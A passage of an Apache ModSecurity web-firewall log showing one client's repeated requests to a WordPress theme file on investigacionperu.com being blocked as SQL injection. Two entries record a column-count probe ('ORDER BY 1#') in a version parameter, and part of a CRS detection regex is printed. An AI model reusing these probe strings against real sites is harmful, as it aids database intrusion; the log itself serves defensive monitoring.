8676:tid 140590436046592] [client 193.29.13.20:37976] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK11mm8LEssXUq6wJ2LSwAAAIY"] [Sat Aug 31 01:19:02.919337 2024] [:error] [pid 9366:tid 140590385690368] [client 193.29.13.20:37978] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK11g1VuGGNTxm_kiOE9QAAAMw"] [Sat Aug 31 01:19:03.435725 2024] [:error] [pid 9366:tid 140590556882688] [client 193.29.13.20:37980] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK11w1VuGGNTxm_kiOE9gAAAMA"] [Sat Aug 31 01:19:03.844738 2024] [:error] [pid 9366:tid 140590326941440] [client 193.29.13.20:37982] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK11w1VuGGNTxm_kiOE9wAAANM"] [Sat Aug 31 01:19:04.326654 2024] [:error] [pid 9366:tid 140590436046592] [client 193.29.13.20:37984] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK12A1VuGGNTxm_kiOE-AAAAMY"] [Sat Aug 31 01:19:04.844862 2024] [:error] [pid 9366:tid 140590394083072] [client 193.29.13.20:37986] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK12A1VuGGNTxm_kiOE-QAAAMs"] [Sat Aug 31 01:19:05.249046 2024] [:error] [pid 9366:tid 140590427653888] [client 193.29.13.20:37988] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK12Q1VuGGNTxm_kiOE-gAAAMc"] [Sat Aug 31 01:19:05.752140 2024] [:error] [pid 9366:tid 140590284977920] [client 193.29.13.20:37990] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK12Q1VuGGNTxm_kiOE-wAAANg"] [Sat Aug 31 01:19:06.230327 2024] [:error] [pid 8675:tid 140590385690368] [client 193.29.13.20:37992] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK12pdLCjsWrLhZKAOZgAAAAEw"] [Sat Aug 31 01:19:06.674447 2024] [:error] [pid 8675:tid 140590301763328] [client 193.29.13.20:37994] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 1.8.5.47' ORDER BY 1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK12pdLCjsWrLhZKAOZgQAAAFY"] [Sat Aug 31 01:19:07.072376 2024] [:error] [pid 8675:tid 140590284977920] [client 193.29.13.20:37996] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK125dLCjsWrLhZKAOZggAAAFg"] [Sat Aug 31 01:19:07.548493 2024] [:error] [pid 8675:tid 140590360512256] [client 193.29.13.20:37998] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK125dLCjsWrLhZKAOZgwAAAE8"] [Sat Aug 31 01:19:08.136045 2024] [:error] [pid 9366:tid 140590540097280] [client 193.29.13.20:38000] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK13A1VuGGNTxm_kiOE_AAAAMI"] [Sat Aug 31 01:19:08.613909 2024] [:error] [pid 8675:tid 140590402475776] [client 193.29.13.20:38002] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK13JdLCjsWrLhZKAOZhAAAAEo"] [Sat Aug 31 01:19:09.126367 2024] [:error] [pid 8675:tid 140590335334144] [client 193.29.13.20:38004] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK13ZdLCjsWrLhZKAOZhQAAAFI"] [Sat Aug 31 01:19:09.445898 2024] [:error] [pid 9366:tid 140590301763328] [client 193.29.13.20:38006] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK13Q1VuGGNTxm_kiOE_QAAANY"] [Sat Aug 31 01:19:09.881629 2024] [:error] [pid 9366:tid 140590377297664] [client 193.29.13.20:38008] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK13Q1VuGGNTxm_kiOE_gAAAM0"] [Sat Aug 31 01:19:10.441056 2024] [:error] [pid 9366:tid 140590402475776] [client 193.29.13.20:38010] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK13g1VuGGNTxm_kiOE_wAAAMo"] [Sat Aug 31 01:19:10.833894 2024] [:error] [pid 9366:tid 140590368904960] [client 193.29.13.20:38012] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK13g1VuGGNTxm_kiOFAAAAAM4"] [Sat Aug 31 01:19:11.344677 2024] [:error] [pid 9366:tid 140590343726848] [client 193.29.13.20:38014] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK13w1VuGGNTxm_kiOFAQAAANE"] [Sat Aug 31 01:19:11.718301 2024] [:error] [pid 9366:tid 140590531704576] [client 193.29.13.20:38016] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 1.8.5.47%' ORDER BY 1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK13w1VuGGNTxm_kiOFAgAAAMM"] [Sat Aug 31 01:19:12.130195 2024] [:error] [pid 8676:tid 140590318548736] [client 193.29.13.20:38018] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK14Gm8LEssXUq6wJ2LTAAAAJQ"] [Sat Aug 31 01:19:12.602400 2024] [:error] [pid 9366:tid 140590452832000] [client 193.29.13.20:38020] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK14A1VuGGNTxm_kiOFAwAAAMQ"] [Sat Aug 31 01:19:13.078173 2024] [:error] [pid 9366:tid 140590360512256] [client 193.29.13.20:38022] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK14Q1VuGGNTxm_kiOFBAAAAM8"] [Sat Aug 31 01:19:13.624363 2024] [:error] [pid 9366:tid 140590419261184] [client 193.29.13.20:38024] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK14Q1VuGGNTxm_kiOFBQAAAMg"] [Sat Aug 31 01:19:14.099225 2024] [:error] [pid 9366:tid 140590335334144] [client 193.29.13.20:38028] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK14g1VuGGNTxm_kiOFBgAAANI"] [Sat Aug 31 01:19:14.461489 2024] [:error] [pid 8675:tid 140590427653888] [client 193.29.13.20:38030] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK14pdLCjsWrLhZKAOZhgAAAEc"] [Sat Aug 31 01:19:14.938231 2024] [:error] [pid 9366:tid 140590556882688] [client 193.29.13.20:38032] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK14g1VuGGNTxm_kiOFBwAAAMA"] [Sat Aug 31 01:19:15.461960 2024] [:error] [pid 9366:tid 140590326941440] [client 193.29.13.20:38034] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK14w1VuGGNTxm_kiOFCAAAANM"] [Sat Aug 31 01:19:15.909871 2024] [:error] [pid 9366:tid 140590394083072] [client 193.29.13.20:38036] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK14w1VuGGNTxm_kiOFCQAAAMs"] [Sat Aug 31 01:19:16.421071 2024] [:error] [pid 9366:tid 140590352119552] [client 193.29.13.20:38038] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag 